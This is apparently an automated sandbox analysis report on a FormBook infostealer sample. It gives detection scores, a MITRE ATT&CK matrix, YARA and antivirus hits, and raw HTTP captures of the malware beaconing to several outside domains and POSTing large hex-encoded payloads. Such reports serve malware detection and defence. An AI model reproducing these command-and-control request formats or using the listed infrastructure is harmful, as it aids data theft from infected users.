Play interactive tourEdit tour

Analysis Report ACre0O2rKa.bin

Overview

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false

 Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through Module Load1Registry Run Keys / Startup Folder1Process Injection512Masquerading1Credential Dumping1Virtualization/Sandbox Evasion2Remote File Copy1Email Collection1Data Encrypted1Standard Cryptographic Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExploitation for Client Execution1Port MonitorsAccessibility FeaturesSoftware Packing11Network SniffingProcess Discovery2Remote ServicesMan in the Browser1Exfiltration Over Other Network MediumRemote File Copy1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesGraphical User Interface1Accessibility FeaturesPath InterceptionVirtualization/Sandbox Evasion2Input CaptureSecurity Software Discovery221Windows Remote ManagementData from Local System1Automated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingProcess Injection512Credentials in FilesRemote System Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol13SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessDeobfuscate/Decode Files or Information1Account ManipulationFile and Directory Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information3Brute ForceSystem Information Discovery12Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features

Signature Overview

AV Detection:

 Antivirus detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe Avira: detection malicious, Label: TR/Injector.jjaxf
 Antivirus detection for sample Show sources
 Source: ACre0O2rKa.exe Avira: detection malicious, Label: TR/Injector.jjaxf
 Multi AV Scanner detection for domain / URL Show sources
 Source: http://www.molestuk.com/un/ Virustotal: Detection: 7% Perma Link
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe Virustotal: Detection: 74% Perma Link Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe ReversingLabs: Detection: 82%
 Multi AV Scanner detection for submitted file Show sources
 Source: ACre0O2rKa.exe Virustotal: Detection: 74% Perma Link Source: ACre0O2rKa.exe ReversingLabs: Detection: 82%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE Source: Yara match File source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE
 Machine Learning detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe Joe Sandbox ML: detected
 Machine Learning detection for sample Show sources
 Source: ACre0O2rKa.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 0.2.ACre0O2rKa.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 1.2.ACre0O2rKa.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 13.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 20.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 14.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 15.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 0.0.ACre0O2rKa.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 17.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 14.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 13.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 17.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 16.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 1.0.ACre0O2rKa.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 4x nop then pop edi 1_2_004140C3 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 4x nop then pop edi 3_2_003D40C3

Networking:

 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /un/?FlAXKZ=l6LFnp+km1quSDfZ52pjMt+mpe8a6/Plu1YIxmUUFqmKbrXpmQH/nh6AvQPYfwnZFddr&Zj=Q0GXBhexZ8l0 HTTP/1.1Host: www.transferas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=BbNiF8OZmcUXoGx97jwAL0Yq+M1uZNoYeKxNjPTk177moqQXSalD+Nu5YzJHjuOZjPRG HTTP/1.1Host: www.websitenhatrang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /un/?FlAXKZ=FOOtQ47hxgivzhxjr6h1MB4NVmrbwUaO2ECBjx9yvE+swNR50NzcZ+CMbkeeVfoV1zfJ&Zj=Q0GXBhexZ8l0 HTTP/1.1Host: www.travelbytravant.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjsFEYDcnDnJGupRrwRyvJO/A57AYTW9xJbMK+XXE HTTP/1.1Host: www.starsaunainstallations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 209.99.64.55 209.99.64.55 Source: Joe Sandbox View IP Address: 23.20.239.12 23.20.239.12
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /un/ HTTP/1.1Host: www.websitenhatrang.comConnection: closeContent-Length: 190296Cache-Control: no-cacheOrigin: http://www.websitenhatrang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.websitenhatrang.com/un/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 6c 41 58 4b 5a 3d 4a 35 42 59 62 62 76 4f 6c 70 46 76 39 68 34 57 73 47 78 37 54 68 4d 36 36 5a 6f 39 66 65 6c 5a 62 73 63 46 6c 64 62 76 7a 35 62 46 70 36 49 4d 62 5a 59 62 75 4a 28 44 48 69 74 64 38 65 57 75 68 35 77 43 44 41 42 4b 36 65 4f 49 4d 43 4e 66 36 76 32 68 73 35 46 78 6a 5f 6f 58 56 39 4e 4d 34 48 4a 35 33 53 7e 36 31 6a 56 6c 55 65 74 5a 6f 75 46 65 32 58 32 62 54 58 72 49 41 49 79 6a 43 43 6d 55 79 47 33 71 74 38 6b 35 6c 2d 70 6a 70 69 6a 38 79 7a 63 36 64 7a 69 61 74 67 7e 49 6d 56 50 76 53 49 70 56 6c 51 48 4a 58 63 58 73 42 67 6e 4e 28 6e 6c 73 6f 74 77 49 6d 45 76 31 6e 69 59 57 39 71 77 63 38 63 6d 47 76 58 4f 4e 39 6f 59 78 63 4a 44 77 36 31 58 65 32 4b 69 6e 37 4e 7a 33 74 6c 4d 36 6c 59 38 30 48 64 4a 79 59 43 35 6a 74 72 62 71 36 6c 52 48 28 68 38 50 76 37 67 37 44 65 53 42 46 35 31 76 37 59 44 42 68 57 61 79 6f 45 5a 73 33 41 42 68 45 69 50 79 6d 78 39 69 43 4c 74 52 70 41 6e 79 62 78 7e 38 39 64 6d 6a 32 77 28 56 53 49 58 64 7e 4e 62 65 37 70 69 31 70 79 6c 62 34 51 58 6e 63 37 79 59 67 41 67 63 43 2d 4c 63 57 36 53 55 71 70 49 69 56 74 31 49 35 51 39 77 62 6e 71 58 73 77 42 54 55 66 4c 67 66 71 53 42 53 6a 4e 33 61 4d 4e 58 42 47 5a 66 33 61 31 6a 41 71 55 54 4a 4f 48 55 7e 58 57 50 43 35 7a 54 72 67 75 55 32 6f 4a 7a 43 2d 31 7a 52 4b 41 76 72 50 7a 54 70 73 63 72 31 41 6f 59 30 53 7e 32 62 6b 31 6d 6c 6a 78 33 30 34 75 4a 34 30 6c 71 69 78 43 64 5a 6f 67 4a 6b 77 53 36 52 58 36 48 62 4e 7e 50 6e 66 68 65 54 6a 77 70 35 67 49 4b 71 31 66 4e 58 43 78 31 53 6c 6f 77 61 61 6d 4e 4f 54 56 2d 35 4d 55 4b 52 77 6e 62 4a 5a 44 63 6b 46 64 33 31 54 77 6b 76 6a 50 53 56 6e 38 36 67 66 6d 67 59 59 57 65 7a 66 75 4e 62 4c 59 6b 6b 4f 62 5f 4e 74 30 75 61 35 46 69 34 32 6b 35 5a 30 44 41 54 68 32 66 4d 6f 35 42 48 4a 36 31 57 63 78 47 68 64 72 78 38 69 57 6e 58 32 45 79 5a 35 6a 53 30 30 32 6c 33 49 42 62 6b 37 57 54 77 30 32 4a 4f 52 49 68 6f 32 46 6b 5a 41 75 4b 33 62 33 4f 39 57 69 56 35 69 4b 66 4a 38 43 2d 6b 4d 33 62 35 36 73 4c 65 50 72 71 6c 50 65 34 32 39 74 6d 55 59 57 32 4e 59 30 73 5a 71 78 31 6a 61 59 5f 5a 34 78 46 53 5f 32 35 4e 6a 55 55 73 35 7a 61 76 52 6e 5a 30 70 53 55 76 4e 58 76 4a 31 46 45 42 34 43 4c 34 78 51 4b 4f 55 6c 31 47 53 6e 4f 38 5a 73 5a 75 31 61 37 53 72 56 4d 54 58 59 4a 46 44 31 6e 79 6d 63 4b 48 69 67 47 79 37 64 6c 28 59 39 5f 6b 72 44 4f 64 44 56 61 38 4a 58 55 6d 58 31 74 65 38 42 38 49 51 49 45 4e 47 35 4e 4e 34 75 44 71 59 7a 62 6c 73 58 56 44 4c 63 45 74 78 35 41 4b 6a 36 6e 65 31 58 6a 42 73 56 31 6d 31 31 71 59 52 73 59 58 74 6c 48 55 6d 61 56 4a 58 76 4b 44 39 7a 61 75 Source: global traffic HTTP traffic detected: POST /un/ HTTP/1.1Host: www.travelbytravant.comConnection: closeContent-Length: 190296Cache-Control: no-cacheOrigin: http://www.travelbytravant.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.travelbytravant.com/un/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 6c 41 58 4b 5a 3d 4e 73 43 58 4f 66 4b 62 79 45 48 4d 6e 41 67 36 35 50 77 79 66 31 34 79 52 32 37 4e 6e 47 4b 35 77 51 4c 6a 7a 68 59 73 28 78 28 72 67 38 41 70 33 65 47 5f 61 4b 54 43 4f 33 61 43 55 50 73 53 78 44 32 4d 32 76 59 70 50 65 4a 77 7e 34 6d 44 6e 63 58 44 32 66 38 76 54 55 66 77 69 31 75 64 7a 48 6b 2d 4b 6b 77 68 5a 35 46 50 46 6b 62 73 7a 41 33 4e 68 30 62 33 57 34 64 67 76 38 6f 50 53 6a 72 35 50 53 7a 4e 4c 4e 53 33 6c 5f 5a 61 35 35 75 42 47 5a 64 4f 45 66 49 4e 6f 38 32 41 30 48 4e 37 49 62 73 5f 4c 58 50 4e 5a 35 50 68 68 39 67 6b 71 54 4e 41 6b 69 54 32 4d 4a 42 78 74 30 51 6f 70 7a 55 69 74 6c 73 35 5a 46 43 66 43 45 56 62 76 73 38 54 28 37 6f 72 46 74 72 42 4a 32 71 51 32 52 66 45 28 33 30 79 47 49 61 5a 36 63 35 38 7a 35 28 43 4e 63 51 44 53 31 55 52 33 43 32 65 6c 61 50 66 6f 6b 7e 39 4a 36 6f 43 36 61 45 79 6c 4f 61 32 72 4b 7a 62 68 5a 4a 32 75 45 63 6a 4b 6b 33 65 5a 69 50 6a 48 52 4d 72 61 61 66 33 4a 5f 31 30 58 5a 6d 62 63 73 73 62 37 79 70 7a 42 45 52 65 33 4c 72 42 6d 4f 53 64 36 46 28 38 6a 55 38 4d 35 31 37 44 28 39 59 31 43 47 38 44 32 6d 68 32 37 53 33 45 58 68 4d 44 55 54 31 6c 79 45 7a 36 65 34 47 79 6f 68 72 38 4c 69 59 4d 30 67 7a 50 75 4c 4b 4a 72 36 64 4c 4d 59 59 67 6b 67 42 6e 50 5f 63 2d 70 77 4e 53 63 47 4a 37 41 46 57 55 4c 36 45 43 4d 38 4e 53 6c 36 63 43 68 5f 64 54 6b 34 34 47 56 5f 4e 71 46 39 6b 52 41 30 4f 5a 35 50 4e 2d 5a 55 45 4f 64 5a 38 4e 34 55 36 6d 28 30 7a 5f 65 75 73 2d 71 34 43 5a 59 58 48 4a 46 6a 41 59 78 49 45 51 72 62 39 66 37 37 6b 4a 30 56 72 4a 5a 75 57 51 30 37 77 44 66 31 34 49 53 59 47 73 57 75 4a 7a 69 35 7a 34 50 77 46 50 71 76 57 46 78 52 6f 41 62 56 50 78 31 6b 55 75 4a 47 4d 50 4f 6f 6a 78 30 6b 4c 69 59 65 58 6e 6b 4c 79 68 28 44 62 6d 4c 66 43 37 77 32 68 4c 70 74 52 4e 71 5f 42 39 79 6a 72 53 7a 65 32 51 43 65 75 67 6a 35 30 6c 5a 4d 32 35 47 44 7e 44 59 57 4d 6b 50 76 4a 56 47 4b 68 55 6c 6a 57 45 4e 41 63 2d 31 6d 78 72 66 63 44 70 5a 42 74 52 34 6a 78 53 75 70 78 68 45 33 32 4c 79 59 77 70 75 33 44 51 44 65 57 75 4d 65 4e 36 62 45 50 56 6e 72 6d 55 79 64 57 41 6f 6d 34 30 5a 6d 56 53 50 47 6f 2d 41 6d 5a 46 64 50 62 47 68 32 53 53 7e 6d 4f 47 59 32 37 45 4c 72 6d 70 52 71 7e 45 77 4b 6f 35 4c 79 72 2d 50 35 7a 2d 50 4a 5a 49 50 56 52 72 30 6a 4c 36 4b 56 73 74 68 42 41 45 6e 72 4f 76 43 77 69 50 75 4b 76 35 57 4a 37 6d 75 75 74 79 71 56 51 67 7a 50 72 4e 66 45 46 42 7a 51 61 48 77 59 28 47 6f 32 6d 30 52 68 51 71 70 39 28 32 43 39 54 30 66 65 44 45 4b 44 55 66 70 72 51 56 47 79 4d 53 6f 53 67 72 49 42 4f 33 32 63 68 54 67 6d 43 59 48 47 6b 65 56 Source: global traffic HTTP traffic detected: POST /un/ HTTP/1.1Host: www.starsaunainstallations.comConnection: closeContent-Length: 190296Cache-Control: no-cacheOrigin: http://www.starsaunainstallations.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.starsaunainstallations.com/un/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 6c 41 58 4b 5a 3d 7a 35 75 69 43 30 28 32 51 55 6c 4a 6a 75 31 62 49 65 28 53 5a 68 41 36 4b 76 62 58 30 66 78 48 50 6d 6c 7a 48 6d 42 4f 35 6f 68 6f 34 53 28 31 42 74 75 44 79 4d 70 41 46 46 4a 75 46 59 55 79 36 6a 37 70 54 50 54 46 59 79 70 54 4a 75 77 6d 4d 65 6c 49 74 37 5a 38 55 51 6a 76 50 79 36 5a 47 6c 43 53 59 75 68 5f 71 5f 37 37 4b 74 6c 6b 28 42 33 53 48 4c 79 32 44 7a 62 4c 30 45 45 63 42 48 57 6c 28 66 79 77 62 4e 35 6b 4a 71 50 75 68 63 30 7a 63 6d 6b 66 37 6f 4f 55 6e 4c 56 4f 6a 70 72 73 72 7a 42 78 74 46 74 77 4b 6a 76 5a 48 54 39 52 54 75 43 65 48 48 51 2d 28 68 4a 37 30 74 37 57 6b 75 71 30 6f 62 44 46 69 6b 52 36 41 33 41 33 52 37 46 75 47 65 42 52 73 37 7a 4c 6f 6c 55 77 6e 52 6e 63 72 67 4f 57 72 72 28 51 5a 30 67 6c 48 37 31 64 7a 49 6c 72 4d 37 71 73 78 61 5a 6f 56 37 36 78 52 4e 67 46 4c 4c 58 52 35 2d 6c 33 55 39 4e 37 54 45 64 7a 34 63 58 34 34 67 74 71 65 39 73 32 47 71 64 50 59 72 75 37 7a 64 7a 5a 67 49 44 51 76 48 31 4d 48 57 76 59 7a 57 6f 39 4a 67 38 48 35 2d 4c 52 65 34 63 4d 55 73 61 79 4b 58 36 77 4c 75 53 77 30 38 4a 48 78 4b 32 50 4e 30 6c 4b 53 4a 76 59 35 6b 6a 48 4d 71 67 4b 7e 56 41 4e 47 31 57 47 49 47 67 61 7a 34 70 50 75 67 53 59 4a 47 7a 51 66 54 56 5a 6a 6b 34 4b 7e 41 46 76 4b 41 59 54 6c 35 72 55 30 34 38 55 34 33 34 5a 4e 36 48 75 28 66 53 39 63 49 6c 46 54 43 28 45 72 4a 52 74 61 47 71 6e 51 37 4b 36 64 55 79 47 28 78 55 73 31 79 61 77 61 41 28 4a 58 52 75 69 33 37 51 4b 68 4e 59 5a 76 32 4c 6b 31 6a 75 4f 41 6b 49 6e 4a 56 47 33 51 79 4d 6e 75 57 66 41 76 43 6d 70 70 67 4f 6b 30 4a 51 43 53 36 7e 70 63 61 64 4a 6a 32 34 6f 43 6c 6b 6d 32 44 34 45 68 66 4b 49 58 6b 51 75 69 62 66 68 47 75 41 2d 53 54 62 52 63 51 62 76 52 69 30 53 37 4b 75 6f 4a 52 42 48 28 61 66 47 50 62 43 59 51 53 71 71 7a 74 55 41 6e 72 70 4e 73 63 4c 41 4a 4b 63 50 7e 33 74 54 31 69 53 53 51 48 44 52 5a 6b 56 57 4e 48 78 76 32 6c 6f 72 34 46 6b 41 66 2d 7a 79 65 63 6b 5a 78 72 6f 56 65 36 52 4d 42 6d 68 41 53 77 4a 61 37 6d 55 72 78 30 32 62 4f 44 4c 44 43 7a 58 46 61 52 53 76 6d 64 6b 6f 45 38 6f 64 41 52 35 6e 4c 7a 58 72 65 58 54 45 72 61 57 48 73 35 74 7a 44 56 72 67 32 48 77 4b 33 36 75 52 4c 47 4d 49 4b 50 52 37 61 6e 71 4c 6f 75 6c 4f 42 58 6e 51 34 67 4c 6b 66 78 54 6c 55 68 38 64 51 45 7e 6d 6f 4c 46 74 46 51 4b 6a 6e 2d 44 71 75 63 44 43 32 47 49 72 49 30 61 6c 4d 55 34 37 50 30 32 63 6b 68 71 36 33 46 54 61 45 37 55 38 63 43 4a 78 6c 63 32 68 6f 61 33 4c 69 47 6c 52 53 73 54 64 48 75 65 6a 70 58 73 32 74 66 71 47 31 42 7a 63 46 52 53 33 45 5a 55 49 48 41 41 59 56 63 46 55 52 76
 Downloads files from webservers via HTTP Show sources
 Source: global traffic HTTP traffic detected: GET /un/?FlAXKZ=l6LFnp+km1quSDfZ52pjMt+mpe8a6/Plu1YIxmUUFqmKbrXpmQH/nh6AvQPYfwnZFddr&Zj=Q0GXBhexZ8l0 HTTP/1.1Host: www.transferas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=BbNiF8OZmcUXoGx97jwAL0Yq+M1uZNoYeKxNjPTk177moqQXSalD+Nu5YzJHjuOZjPRG HTTP/1.1Host: www.websitenhatrang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /un/?FlAXKZ=FOOtQ47hxgivzhxjr6h1MB4NVmrbwUaO2ECBjx9yvE+swNR50NzcZ+CMbkeeVfoV1zfJ&Zj=Q0GXBhexZ8l0 HTTP/1.1Host: www.travelbytravant.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjsFEYDcnDnJGupRrwRyvJO/A57AYTW9xJbMK+XXE HTTP/1.1Host: www.starsaunainstallations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.vrtravelers.net
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /un/ HTTP/1.1Host: www.websitenhatrang.comConnection: closeContent-Length: 190296Cache-Control: no-cacheOrigin: http://www.websitenhatrang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.websitenhatrang.com/un/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 6c 41 58 4b 5a 3d 4a 35 42 59 62 62 76 4f 6c 70 46 76 39 68 34 57 73 47 78 37 54 68 4d 36 36 5a 6f 39 66 65 6c 5a 62 73 63 46 6c 64 62 76 7a 35 62 46 70 36 49 4d 62 5a 59 62 75 4a 28 44 48 69 74 64 38 65 57 75 68 35 77 43 44 41 42 4b 36 65 4f 49 4d 43 4e 66 36 76 32 68 73 35 46 78 6a 5f 6f 58 56 39 4e 4d 34 48 4a 35 33 53 7e 36 31 6a 56 6c 55 65 74 5a 6f 75 46 65 32 58 32 62 54 58 72 49 41 49 79 6a 43 43 6d 55 79 47 33 71 74 38 6b 35 6c 2d 70 6a 70 69 6a 38 79 7a 63 36 64 7a 69 61 74 67 7e 49 6d 56 50 76 53 49 70 56 6c 51 48 4a 58 63 58 73 42 67 6e 4e 28 6e 6c 73 6f 74 77 49 6d 45 76 31 6e 69 59 57 39 71 77 63 38 63 6d 47 76 58 4f 4e 39 6f 59 78 63 4a 44 77 36 31 58 65 32 4b 69 6e 37 4e 7a 33 74 6c 4d 36 6c 59 38 30 48 64 4a 79 59 43 35 6a 74 72 62 71 36 6c 52 48 28 68 38 50 76 37 67 37 44 65 53 42 46 35 31 76 37 59 44 42 68 57 61 79 6f 45 5a 73 33 41 42 68 45 69 50 79 6d 78 39 69 43 4c 74 52 70 41 6e 79 62 78 7e 38 39 64 6d 6a 32 77 28 56 53 49 58 64 7e 4e 62 65 37 70 69 31 70 79 6c 62 34 51 58 6e 63 37 79 59 67 41 67 63 43 2d 4c 63 57 36 53 55 71 70 49 69 56 74 31 49 35 51 39 77 62 6e 71 58 73 77 42 54 55 66 4c 67 66 71 53 42 53 6a 4e 33 61 4d 4e 58 42 47 5a 66 33 61 31 6a 41 71 55 54 4a 4f 48 55 7e 58 57 50 43 35 7a 54 72 67 75 55 32 6f 4a 7a 43 2d 31 7a 52 4b 41 76 72 50 7a 54 70 73 63 72 31 41 6f 59 30 53 7e 32 62 6b 31 6d 6c 6a 78 33 30 34 75 4a 34 30 6c 71 69 78 43 64 5a 6f 67 4a 6b 77 53 36 52 58 36 48 62 4e 7e 50 6e 66 68 65 54 6a 77 70 35 67 49 4b 71 31 66 4e 58 43 78 31 53 6c 6f 77 61 61 6d 4e 4f 54 56 2d 35 4d 55 4b 52 77 6e 62 4a 5a 44 63 6b 46 64 33 31 54 77 6b 76 6a 50 53 56 6e 38 36 67 66 6d 67 59 59 57 65 7a 66 75 4e 62 4c 59 6b 6b 4f 62 5f 4e 74 30 75 61 35 46 69 34 32 6b 35 5a 30 44 41 54 68 32 66 4d 6f 35 42 48 4a 36 31 57 63 78 47 68 64 72 78 38 69 57 6e 58 32 45 79 5a 35 6a 53 30 30 32 6c 33 49 42 62 6b 37 57 54 77 30 32 4a 4f 52 49 68 6f 32 46 6b 5a 41 75 4b 33 62 33 4f 39 57 69 56 35 69 4b 66 4a 38 43 2d 6b 4d 33 62 35 36 73 4c 65 50 72 71 6c 50 65 34 32 39 74 6d 55 59 57 32 4e 59 30 73 5a 71 78 31 6a 61 59 5f 5a 34 78 46 53 5f 32 35 4e 6a 55 55 73 35 7a 61 76 52 6e 5a 30 70 53 55 76 4e 58 76 4a 31 46 45 42 34 43 4c 34 78 51 4b 4f 55 6c 31 47 53 6e 4f 38 5a 73 5a 75 31 61 37 53 72 56 4d 54 58 59 4a 46 44 31 6e 79 6d 63 4b 